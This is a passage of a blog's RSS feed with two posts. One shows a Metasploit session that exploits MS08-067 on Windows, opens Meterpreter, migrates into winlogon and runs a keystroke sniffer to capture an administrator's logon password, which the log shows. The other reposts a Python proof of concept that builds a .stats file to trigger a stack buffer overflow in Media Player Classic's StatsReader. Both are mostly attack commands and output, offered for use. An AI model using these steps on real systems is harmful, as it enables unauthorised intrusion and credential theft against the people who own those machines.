		<description><![CDATA[sniffing logon admin with metaspoit<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=98&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>======= start code ========</p>
<p>msf exploit(ms08_067_netapi) &gt; exploit<br />
[*] Triggering the vulnerability&#8230;<br />
[*] Sending stage (2650 bytes)<br />
[*] Uploading DLL (75787 bytes)&#8230;<br />
[*] Upload completed.<br />
[*] Meterpreter session 1 opened</p>
<p>meterpreter &gt; ps</p>
<p>Process list<br />
============</p>
<p>PID   Name          Path<br />
&#8212;   &#8212;-          &#8212;-<br />
292   wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe<br />
316   Explorer.EXE  C:\WINDOWS\Explorer.EXE<br />
356   smss.exe      \SystemRoot\System32\smss.exe<br />
416   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe<br />
440   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe<br />
[ snip ]</p>
<p>meterpreter &gt; migrate 440<br />
[*] Migrating to 440&#8230;<br />
[*] Migration completed successfully.</p>
<p>meterpreter &gt; keyscan_start<br />
Starting the keystroke sniffer&#8230;<br />
[ wait for user login ]</p>
<p>meterpreter &gt; keyscan_dump<br />
Dumping captured keystrokes&#8230;<br />
Administrator &lt;Tab&gt;b4mb00hous3  &lt;Return&gt;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rumahbamboo.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rumahbamboo.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rumahbamboo.wordpress.com/98/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=98&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://rumahbamboo.wordpress.com/2010/03/13/capturing-logon-credentials-with-meterpreter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/532b44437e225e495b7bc6caa60accc3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rumahbamboo</media:title>
		</media:content>
	</item>
		<item>
		<title>Media Player classic StatsReader (.stats file) stack buffer Overflow poc</title>
		<link>http://rumahbamboo.wordpress.com/2010/03/13/media-player-classic-statsreader-stats-file-stack-buffer-overflow-poc/</link>
		<comments>http://rumahbamboo.wordpress.com/2010/03/13/media-player-classic-statsreader-stats-file-stack-buffer-overflow-poc/#comments</comments>
		<pubDate>Sat, 13 Mar 2010 05:25:50 +0000</pubDate>
		<dc:creator>rumahbamboo</dc:creator>
				<category><![CDATA[Local]]></category>
		<category><![CDATA[Buffer Overflow]]></category>
		<category><![CDATA[Media Player]]></category>

		<guid isPermaLink="false">http://rumahbamboo.wordpress.com/?p=95</guid>
		<description><![CDATA[# Title: Media Player classic StatsReader (.stats file) stack buffer Overflow poc # EDB-ID: 11706 # CVE-ID: () # OSVDB-ID: () # Author: PLATEN # Published: 2010-03-12 # Verified: no # Download Exploit Code # Download N/A &#60;!&#8211; --&#62; #! /usr/bin/python # # ############################################################################# # Media Player classic StatsReader (.stats file) stack buffer Overflow poc <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=95&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p># Title: Media Player classic StatsReader (.stats file) stack buffer Overflow poc<br />
# EDB-ID: 11706<br />
# CVE-ID: ()<br />
# OSVDB-ID: ()<br />
# Author: PLATEN<br />
# Published: 2010-03-12<br />
# Verified: no<br />
# Download <a href="http://www.exploit-db.com/download/11706">Exploit Code</a><br />
# Download N/A</p>
<p>&lt;!&#8211;</pre>
<p>--&gt;<span id="more-95"></span></p>
<pre>#! /usr/bin/python
#
# #############################################################################
# Media Player classic StatsReader (.stats file) stack buffer Overflow poc
# Software Link: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html
# Tested in : Windows XP SP3
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Found by: PLATEN @ ItSecTeam
# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder
# patch: C:\Program Files (x86)\K-Lite Codec Pack\Tools\StatsReader.exe
#        Usage: ./stats-poc.py
# #############################################################################
#
print """
[~] Media Player clissic StatsReader (.stats file) stack buffer Overflow poc
[~] mail : Bug@ItSecTeam.com
[~] Web:  WwW.ITSecTeam.com
[~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
"""

data= "\x41" *500000
try:
        file=open("media-poc.stats",'w')
        file.write( data )
        file.close()
        print   ("[+] File created successfully: media-poc.stats" )
except:
        print "[-] Error cant write file to system\n"
</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rumahbamboo.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rumahbamboo.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rumahbamboo.wordpress.com/95/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rumahbamboo.wordpress.com&amp;blog=12547398&amp;post=95&amp;subd=rumahbamboo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://rumahbamboo.wordpress.com/2010/03/13/media-player-classic-statsreader-stats-file-stack-buffer-overflow-poc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/532b44437e225e495b7bc6caa60accc3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rumahbamboo</media:title>
		</media:content>
	</item>
	</channel>
</rss>
